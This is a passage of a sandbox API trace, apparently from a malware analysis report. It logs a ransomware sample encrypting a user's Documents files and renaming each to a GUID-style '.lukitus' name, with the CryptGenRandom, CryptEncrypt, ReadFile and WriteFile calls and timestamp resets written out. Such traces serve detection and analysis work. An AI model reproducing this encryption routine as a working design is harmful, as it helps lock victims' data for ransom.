pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.136] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\WhVF-K7m2h 9Ki2J.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\whvf-k7m2h 9ki2j.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.136] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\WhVF-K7m2h 9Ki2J.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\whvf-k7m2h 9ki2j.xlsx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-43743AB0-5B4F9943C7B9.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-43743ab0-5b4f9943c7b9.lukitus"), dwFlags=0x9) returned 1 [0107.138] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.138] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.144] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xf977, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xf977, lpOverlapped=0x0) returned 1 [0107.145] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.145] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xf977, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xf977, lpOverlapped=0x0) returned 1 [0107.145] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.145] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63e314d0, dwHighDateTime=0x1d31760)) [0107.145] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.145] FlushFileBuffers (hFile=0x324) returned 1 [0107.148] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\p3i2AVU6sbThPuu.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\p3i2avu6sbthpuu.rtf"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadc7ed50, ftCreationTime.dwHighDateTime=0x1d30054, ftLastAccessTime.dwLowDateTime=0xed74e6f0, ftLastAccessTime.dwHighDateTime=0x1d305b4, ftLastWriteTime.dwLowDateTime=0xed74e6f0, ftLastWriteTime.dwHighDateTime=0x1d305b4, nFileSizeHigh=0x0, nFileSizeLow=0xc093)) returned 1 [0107.148] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.148] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.148] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.148] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.148] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.148] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.148] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.148] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.149] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.149] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.149] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.149] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.149] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.149] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.149] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.149] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.149] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.149] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.149] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.149] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.149] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\p3i2AVU6sbThPuu.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\p3i2avu6sbthpuu.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.149] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\p3i2AVU6sbThPuu.rtf" (normalized: "c:\\users\\aetadzjz\\documents\\p3i2avu6sbthpuu.rtf"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-3F7EEA71-EEAB13681EBA.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-3f7eea71-eeab13681eba.lukitus"), dwFlags=0x9) returned 1 [0107.150] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.150] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.156] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xc093, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xc093, lpOverlapped=0x0) returned 1 [0107.157] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.157] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xc093, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xc093, lpOverlapped=0x0) returned 1 [0107.157] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.157] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63e57630, dwHighDateTime=0x1d31760)) [0107.157] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.157] FlushFileBuffers (hFile=0x324) returned 1 [0107.160] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\_wLCg2yNbmoGGi.docx" (normalized: "c:\\users\\aetadzjz\\documents\\_wlcg2ynbmoggi.docx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8f8170, ftCreationTime.dwHighDateTime=0x1d2c13d, ftLastAccessTime.dwLowDateTime=0x409bc090, ftLastAccessTime.dwHighDateTime=0x1d2d6f0, ftLastWriteTime.dwLowDateTime=0x409bc090, ftLastWriteTime.dwHighDateTime=0x1d2d6f0, nFileSizeHigh=0x0, nFileSizeLow=0x5d32)) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.160] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\_wLCg2yNbmoGGi.docx" (normalized: "c:\\users\\aetadzjz\\documents\\_wlcg2ynbmoggi.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.161] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\_wLCg2yNbmoGGi.docx" (normalized: "c:\\users\\aetadzjz\\documents\\_wlcg2ynbmoggi.docx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-44E29957-51107F7F4923.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-44e29957-51107f7f4923.lukitus"), dwFlags=0x9) returned 1 [0107.162] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.162] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.168] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x5d32, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x5d32, lpOverlapped=0x0) returned 1 [0107.170] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.170] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x5d32, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x5d32, lpOverlapped=0x0) returned 1 [0107.170] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.171] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63e7d790, dwHighDateTime=0x1d31760)) [0107.171] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.171] FlushFileBuffers (hFile=0x324) returned 1 [0107.174] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\Um6ac xaRWrq3ZwHex.pps" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\um6ac xarwrq3zwhex.pps"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9e9eec0, ftCreationTime.dwHighDateTime=0x1d2fcdd, ftLastAccessTime.dwLowDateTime=0x81e4a90, ftLastAccessTime.dwHighDateTime=0x1d3043f, ftLastWriteTime.dwLowDateTime=0x81e4a90, ftLastWriteTime.dwHighDateTime=0x1d3043f, nFileSizeHigh=0x0, nFileSizeLow=0x2b5d)) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.174] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\Um6ac xaRWrq3ZwHex.pps" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\um6ac xarwrq3zwhex.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.174] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\Um6ac xaRWrq3ZwHex.pps" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\um6ac xarwrq3zwhex.pps"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-B70504B4-E9A7156822C1.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-b70504b4-e9a7156822c1.lukitus"), dwFlags=0x9) returned 1 [0107.176] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.176] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.182] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x2b5d, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x2b5d, lpOverlapped=0x0) returned 1 [0107.182] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.182] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x2b5d, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x2b5d, lpOverlapped=0x0) returned 1 [0107.183] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.183] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63e7d790, dwHighDateTime=0x1d31760)) [0107.183] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.183] FlushFileBuffers (hFile=0x324) returned 1 [0107.187] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\ehbu75um3wvro9aSR.pps" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\ehbu75um3wvro9asr.pps"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0f23b90, ftCreationTime.dwHighDateTime=0x1d2f6c6, ftLastAccessTime.dwLowDateTime=0x4ea114d0, ftLastAccessTime.dwHighDateTime=0x1d2fd31, ftLastWriteTime.dwLowDateTime=0x4ea114d0, ftLastWriteTime.dwHighDateTime=0x1d2fd31, nFileSizeHigh=0x0, nFileSizeLow=0x18fd6)) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.188] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\ehbu75um3wvro9aSR.pps" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\ehbu75um3wvro9asr.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.188] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\ehbu75um3wvro9aSR.pps" (normalized: 